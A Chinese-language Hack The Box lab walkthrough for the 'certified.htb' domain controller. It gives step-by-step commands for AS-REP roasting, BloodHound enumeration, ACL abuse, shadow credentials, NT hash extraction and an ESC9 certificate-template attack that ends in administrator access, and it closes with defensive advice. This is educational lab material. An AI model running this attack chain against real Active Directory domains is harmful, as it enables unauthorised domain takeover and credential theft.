HTB Certify 渗透测试实战教学文档<\/h1>

1. 初始信息收集<\/h2>

1.1 网络扫描<\/h3>

使用nmap进行初始扫描：<\/p>

nmap -sC -sV -oA initial_scan 10.10.11.41
<\/span><\/span><\/code><\/pre>对发现的每个端口进行详细扫描，并确保将目标主机名添加到hosts文件中：<\/p>
10.10.11.41 certified.htb dc01.certified.htb
<\/code><\/pre>
1.2 SMB服务检查<\/h3>
尝试使用smbclient连接SMB服务：<\/p>
smbclient -L \/\/10.10.11.41 -U 'judith.mader%judith09'<\/span>
<\/span><\/span><\/code><\/pre>2. 域环境攻击<\/h2>
2.1 AS-REP Roasting攻击<\/h3>
攻击原理<\/strong>：AS-REP Roasting是通过滥用Kerberos协议的工作方式发起的攻击，针对未启用预认证的账户。<\/p>
攻击步骤<\/strong>：<\/p>

枚举所有域用户<\/li>
请求AS-REP响应<\/li>
捕获和分析AS-REP响应中的加密信息<\/li>
离线破解密码哈希<\/li>
<\/ol>
实际操作<\/strong>：<\/p>
# 使用GetNPUsers.py尝试AS-REP Roasting<\/span>
<\/span><\/span>GetNPUsers.py certified.htb\/judith.mader:judith09 -dc-ip 10.10.11.41 -request
<\/span><\/span><\/code><\/pre>2.2 BloodHound信息收集<\/h3>
使用BloodHound收集域环境信息：<\/p>
bloodhound-python -c all -u 'judith.mader'<\/span> -p 'judith09'<\/span> -d certified.htb -dc DC01.certified.htb -ns 10.10.11.41 --zip
<\/span><\/span><\/code><\/pre>关键发现<\/strong>：<\/p>

judith.mader对management组有WriteOwner权限<\/li>
management组对management_svc用户有GenericWrite权限<\/li>
management_svc用户对ca_operator用户有GenericAll权限<\/li>
<\/ul>
3. 权限提升路径<\/h2>
3.1 修改组所有权<\/h3>
使用bloodyAD修改management组的所有者：<\/p>
bloodyAD --host dc01.certified.htb -d certified.htb -u judith.mader -p 'judith09'<\/span> set owner management judith.mader
<\/span><\/span><\/code><\/pre>3.2 添加写成员权限<\/h3>
验证并添加WriteMembers权限：<\/p>
# 验证权限<\/span>
<\/span><\/span>impacket-dacledit -action read -rights WriteMembers -principal 'judith.mader'<\/span> -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB'<\/span> -dc-ip 10.10.11.41 "certified.htb\/judith.mader:judith09"<\/span>
<\/span><\/span>
<\/span><\/span># 添加权限<\/span>
<\/span><\/span>impacket-dacledit -action write -rights WriteMembers -principal 'judith.mader'<\/span> -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB'<\/span> -dc-ip 10.10.11.41 "certified.htb\/judith.mader:judith09"<\/span>
<\/span><\/span><\/code><\/pre>3.3 加入management组<\/h3>
将judith.mader加入management组：<\/p>
bloodyAD --host dc01.certified.htb -d certified.htb -u judith.mader -p 'judith09'<\/span> add groupMember 'management'<\/span> 'judith.mader'<\/span>
<\/span><\/span><\/code><\/pre>4. 获取management_svc凭证<\/h2>
4.1 影子凭证攻击<\/h3>
使用pywhisker添加影子凭证：<\/p>
python pywhisker.py -d "certified.htb"<\/span> -u "judith.mader"<\/span> -p judith09 --target management_svc --action add
<\/span><\/span><\/code><\/pre>4.2 获取TGT<\/h3>
使用PKINITtools申请TGT：<\/p>
python gettgtpkinit.py -cert-pfx t0cZeyin.pfx -pfx-pass Ryk4iT9K3g7uEgqSfFG1 certified.htb\/management_svc management_svc.ccache
<\/span><\/span><\/code><\/pre>注意<\/strong>：Kerberos对时间同步敏感，确保攻击机器与目标服务器时间差不超过5分钟：<\/p>
ntpdate 10.10.11.41
<\/span><\/span><\/code><\/pre>4.3 获取NTLM哈希<\/h3>
设置环境变量后获取哈希：<\/p>
export KRB5CCNAME=<\/span>management_svc.ccache
<\/span><\/span>python getnthash.py -key 3bff551f32ba6bc443866ce6a16d3d3c548785c40735c30d42a756824bb4c5ca certified.htb\/management_svc
<\/span><\/span><\/code><\/pre>4.4 使用evil-winrm登录<\/h3>
evil-winrm -i dc01.certified.htb -u management_svc -H 'a091c1832bcdd4677c28b5a6a1295584'<\/span>
<\/span><\/span><\/code><\/pre>5. 域证书服务攻击<\/h2>
5.1 查找易受攻击的证书模板<\/h3>
使用certipy-ad查找：<\/p>
certipy-ad find -u judith.mader@certified.htb -p judith09 -dc-ip 10.10.11.41
<\/span><\/span><\/code><\/pre>5.2 控制ca_operator账户<\/h3>
修改ca_operator密码：<\/p>
net user ca_operator redteam \/DOMAIN
<\/span><\/span><\/code><\/pre>更新用户主体名称：<\/p>
certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb
<\/span><\/span><\/code><\/pre>5.3 请求易受攻击的证书<\/h3>
请求ESC9漏洞证书模板：<\/p>
certipy req -username ca_operator@certified.htb -p redteam -ca certified-DC01-CA -template CertifiedAuthentication -debug
<\/span><\/span><\/code><\/pre>5.4 获取管理员哈希<\/h3>
使用证书进行认证：<\/p>
certipy auth -pfx administrator.pfx -username administrator -domain certified.htb
<\/span><\/span><\/code><\/pre>6. 最终访问<\/h2>
使用获取的管理员凭证通过evil-winrm登录：<\/p>
evil-winrm -i dc01.certified.htb -u administrator -H <获取的管理员哈希>
<\/span><\/span><\/code><\/pre>关键知识点总结<\/h2>

AS-REP Roasting<\/strong>：针对未启用预认证的Kerberos账户的攻击方法<\/li>
BloodHound分析<\/strong>：识别域内权限关系链的关键工具<\/li>
ACL滥用<\/strong>：WriteOwner和WriteMembers权限的利用<\/li>
影子凭证攻击<\/strong>：通过Key Credential属性获取目标账户访问权限<\/li>
AD CS攻击<\/strong>：利用证书模板漏洞进行域提权<\/li>
时间同步<\/strong>：Kerberos认证对时间同步的严格要求<\/li>
<\/ol>
防御建议<\/h2>

对所有用户启用Kerberos预认证<\/li>
定期审计域内ACL权限分配<\/li>
限制Key Credential属性的写入权限<\/li>
审查和加固证书模板配置<\/li>
实施严格的时间同步策略<\/li>
监控异常证书请求活动<\/li>
<\/ol>

HTB Certify 渗透测试实战教学文档<\/h1>

1. 初始信息收集<\/h2>

2. 域环境攻击<\/h2>

3. 权限提升路径<\/h2>

4. 获取management_svc凭证<\/h2>

5. 域证书服务攻击<\/h2>

防御建议<\/h2> 对所有用户启用Kerberos预认证<\/li> 定期审计域内ACL权限分配<\/li> 限制Key Credential属性的写入权限<\/li> 审查和加固证书模板配置<\/li> 实施严格的时间同步策略<\/li> 监控异常证书请求活动<\/li> <\/ol>

防御建议<\/h2>

对所有用户启用Kerberos预认证<\/li>
定期审计域内ACL权限分配<\/li>
限制Key Credential属性的写入权限<\/li>
审查和加固证书模板配置<\/li>
实施严格的时间同步策略<\/li>
监控异常证书请求活动<\/li> <\/ol>